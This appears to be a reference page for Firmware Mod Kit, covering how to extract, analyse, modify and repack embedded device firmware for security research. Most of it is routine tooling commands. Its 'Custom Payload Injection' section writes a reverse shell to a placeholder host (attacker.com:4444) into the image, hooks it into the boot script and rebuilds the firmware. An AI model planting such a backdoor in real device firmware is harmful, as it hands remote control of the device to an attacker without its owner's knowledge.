Firmware Mod Kit
Overview
Section intitulée « Overview »Firmware Mod Kit is a collection of bash scripts that automate the extraction, modification, and repacking of firmware images from embedded devices. It streamlines the process of unpacking filesystem archives, analyzing kernel images, and rebuilding modified firmware for testing and research purposes.
Installation
Section intitulée « Installation »On Linux (Debian/Ubuntu)
Section intitulée « On Linux (Debian/Ubuntu) »# Clone the repository
git clone https://github.com/rampageX/firmware-mod-kit.git
cd firmware-mod-kit
# Install dependencies
sudo apt-get update
sudo apt-get install build-essential git zlib1g-dev liblzma-dev \
bzip2 python3 python3-pip unzip
# Install Python dependencies
pip3 install pycrypto capstone
# Make scripts executable
chmod +x *.sh
chmod +x trunk/tools/*.shOn macOS
Section intitulée « On macOS »# Using Homebrew
brew install binutils squashfs-tools
# Clone and setup
git clone https://github.com/rampageX/firmware-mod-kit.git
cd firmware-mod-kit
chmod +x *.sh trunk/tools/*.shBasic Workflow
Section intitulée « Basic Workflow »| Step | Command | Purpose |
|---|---|---|
| Extract | ./extract-firmware.sh firmware.bin | Unpack filesystem and kernel from binary |
| Analyze | Browse extract folder structure | Explore unpacked contents |
| Modify | Edit files in extract/ directory | Change configs, binaries, or scripts |
| Rebuild | ./build-firmware.sh | Repack filesystem and kernel |
| Verify | Compare checksums, test image | Validate integrity and functionality |
Extracting Firmware
Section intitulée « Extracting Firmware »Basic Extraction
Section intitulée « Basic Extraction »# Extract single firmware image
./extract-firmware.sh firmware.bin
# Extract with output to custom directory
./extract-firmware.sh -d custom_dir firmware.bin
# Extract and preserve original
cp firmware.bin firmware.bin.backup
./extract-firmware.sh firmware.binWhat Gets Extracted
Section intitulée « What Gets Extracted »After extraction, the extract/ folder contains:
- squashfs-root/ — Root filesystem (configs, binaries, libraries)
- vmlinuz or kernel — Kernel image
- rootfs.md5 — MD5 checksum of root filesystem
- uImage or uImage.lzma — Compressed kernel (if present)
Analyzing Extracted Contents
Section intitulée « Analyzing Extracted Contents »# List directory structure
cd extract/squashfs-root
ls -la
# Find configuration files
find . -name "*.conf" -o -name "*.cfg"
# Locate init scripts
find . -path "*/etc/init.d/*"
# Find web interface files (for routers)
find . -path "*/www/*" -o -path "*/html/*"
# Identify architecture and binary info
file bin/* usr/bin/* | grep -i "arm\|mips\|x86"Modifying Firmware Contents
Section intitulée « Modifying Firmware Contents »Common Modifications
Section intitulée « Common Modifications »# Change router hostname
cd extract/squashfs-root
nano etc/hostname
# Modify boot scripts
nano etc/init.d/rcS
# Edit web configuration
nano www/index.html
# Adjust network settings
nano etc/network/interfacesAdding Files
Section intitulée « Adding Files »# Copy new files into filesystem
cp -r /path/to/new/files extract/squashfs-root/opt/
# Add custom startup script
cp my_script.sh extract/squashfs-root/etc/init.d/
chmod +x extract/squashfs-root/etc/init.d/my_script.sh
# Add security research tools
mkdir -p extract/squashfs-root/opt/tools
cp analysis_tool extract/squashfs-root/opt/tools/
chmod +x extract/squashfs-root/opt/tools/analysis_toolRemoving Bloatware
Section intitulée « Removing Bloatware »# Navigate to filesystem
cd extract/squashfs-root
# Remove unnecessary binaries
rm -f bin/telnetd usr/bin/hnap
# Clean up web interface components
rm -rf www/images/old_ui
# Strip debug symbols from binaries (reduces size)
for file in bin/* usr/bin/*; do
[ -f "$file" ] && strip "$file" 2>/dev/null
doneRepacking Firmware
Section intitulée « Repacking Firmware »Building Modified Firmware
Section intitulée « Building Modified Firmware »# Build firmware with extracted modifications
./build-firmware.sh
# Specify output filename
./build-firmware.sh -o modified_firmware.bin
# Include specific filesystem format
./build-firmware.sh -b extract/Advanced Build Options
Section intitulée « Advanced Build Options »# Build with compression enabled
./build-firmware.sh -z
# Build with specific architecture
./build-firmware.sh -a mips
# Verbose output for debugging
./build-firmware.sh -v
# Skip checksum verification
./build-firmware.sh -sPost-Build Validation
Section intitulée « Post-Build Validation »# Verify file size
ls -lh modified_firmware.bin
# Check file type
file modified_firmware.bin
# Compare with original
ls -lh firmware.bin modified_firmware.bin
# Generate checksum
md5sum modified_firmware.bin > modified_firmware.md5
sha256sum modified_firmware.bin > modified_firmware.sha256Supported Firmware Formats
Section intitulée « Supported Firmware Formats »| Format | Extension | Architecture | Notes |
|---|---|---|---|
| SquashFS | .squashfs | ARM/MIPS | Most common in routers |
| JFFS2 | .jffs2 | Various | Older embedded devices |
| UBI | .ubi | NAND | Modern Android devices |
| CRAMFS | .cramfs | ARM/MIPS | Legacy systems |
| Broadcom TRX | .trx | MIPS | Broadcom SoC routers |
| D-Link | .bin | MIPS | D-Link-specific format |
IoT Security Research Workflows
Section intitulée « IoT Security Research Workflows »Firmware Backdoor Analysis
Section intitulée « Firmware Backdoor Analysis »# Extract firmware
./extract-firmware.sh router_firmware.bin
# Search for suspicious binaries
find extract/squashfs-root -type f -executable
strings extract/squashfs-root/bin/suspicious_bin | grep -i "backdoor\|shell\|execute"
# Check init scripts for payload execution
cat extract/squashfs-root/etc/init.d/rcS
# Look for hidden network services
grep -r "listen\|socket" extract/squashfs-root/etc/Configuration Extraction
Section intitulée « Configuration Extraction »# Extract all configuration files
find extract/squashfs-root/etc -type f ! -path "*/.*"
# Dump network configuration
cat extract/squashfs-root/etc/config/network
# Extract credentials (if plaintext)
grep -r "password\|username\|auth" extract/squashfs-root/etc/
# Export wireless settings
cat extract/squashfs-root/etc/config/wirelessCustom Payload Injection
Section intitulée « Custom Payload Injection »# Create payload directory
mkdir -p extract/squashfs-root/opt/payload
# Add reverse shell
cat > extract/squashfs-root/opt/payload/shell.sh << 'EOF'
#!/bin/sh
exec /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1
EOF
chmod +x extract/squashfs-root/opt/payload/shell.sh
# Modify init script to call payload
echo "/opt/payload/shell.sh &" >> extract/squashfs-root/etc/init.d/rcS
# Rebuild
./build-firmware.sh -o payload_firmware.binCommon Issues and Solutions
Section intitulée « Common Issues and Solutions »Issue: Extraction Fails
Section intitulée « Issue: Extraction Fails »# Verify firmware file
file firmware.bin
# Try with verbose output
./extract-firmware.sh -v firmware.bin
# Check available disk space
df -h
# Ensure proper permissions
chmod +x *.shIssue: Compression Errors
Section intitulée « Issue: Compression Errors »# Install additional tools
sudo apt-get install xz-utils lzma
# Verify tool availability
which unsquashfs
which mkfs.squashfs
which lzmaIssue: Build Produces Invalid Image
Section intitulée « Issue: Build Produces Invalid Image »# Check extract directory exists
ls extract/
# Verify filesystem permissions
find extract/squashfs-root -type f -exec chmod 644 {} \;
find extract/squashfs-root -type d -exec chmod 755 {} \;
# Rebuild with verbose output
./build-firmware.sh -v
# Validate output
file modified_firmware.binIntegration with Other Tools
Section intitulée « Integration with Other Tools »Using with Burp Suite for Web Analysis
Section intitulée « Using with Burp Suite for Web Analysis »# Extract firmware
./extract-firmware.sh firmware.bin
# Locate web interface
find extract/squashfs-root -path "*/www/*" -o -path "*/html/*"
# Copy web files to analysis directory
cp -r extract/squashfs-root/www /tmp/firmware_web
# Analyze with Burp Suite as upstream proxyCombining with Binwalk
Section intitulée « Combining with Binwalk »# Initial analysis with Binwalk
binwalk firmware.bin
# Extract with Binwalk
binwalk -e firmware.bin
# Compare extraction methods
diff -r _firmware.bin.extracted extract/
# Deep analysis
binwalk -A firmware.binUsing with IDA Pro or Ghidra
Section intitulée « Using with IDA Pro or Ghidra »# Extract kernel image
./extract-firmware.sh firmware.bin
# Locate kernel binary
find extract -name "kernel" -o -name "vmlinuz" -o -name "uImage"
# Extract kernel specifically
cd extract
file vmlinuz
# Open in Ghidra/IDA Pro for reverse engineering
# Set architecture based on strings analysis
strings vmlinuz | grep -i "mips\|arm"Advanced Techniques
Section intitulée « Advanced Techniques »Patching Vulnerabilities
Section intitulée « Patching Vulnerabilities »# Extract vulnerable firmware
./extract-firmware.sh vulnerable.bin
# Identify vulnerability
strings extract/squashfs-root/bin/vulnerable_service | grep "format"
# Replace with patched binary (if available)
cp patched_service extract/squashfs-root/bin/vulnerable_service
chmod +x extract/squashfs-root/bin/vulnerable_service
# Rebuild
./build-firmware.sh -o patched.binCreating Minimal Rootfs
Section intitulée « Creating Minimal Rootfs »# Extract original
./extract-firmware.sh firmware.bin
# Remove unnecessary components
cd extract/squashfs-root
rm -rf usr/share/doc usr/man var/log
# Remove large libraries if not needed
find lib -name "*.a" -delete
# Rebuild minimal image
cd ../..
./build-firmware.sh -o minimal.binBest Practices
Section intitulée « Best Practices »- Always backup original firmware before extraction
- Document modifications with comments in modified files
- Test in sandbox before deploying modified firmware
- Verify checksums of repacked images
- Use version control to track firmware changes
- Clean up temporary extraction directories after building
- Preserve file permissions during modification
- Keep entropy tables intact if firmware has signature verification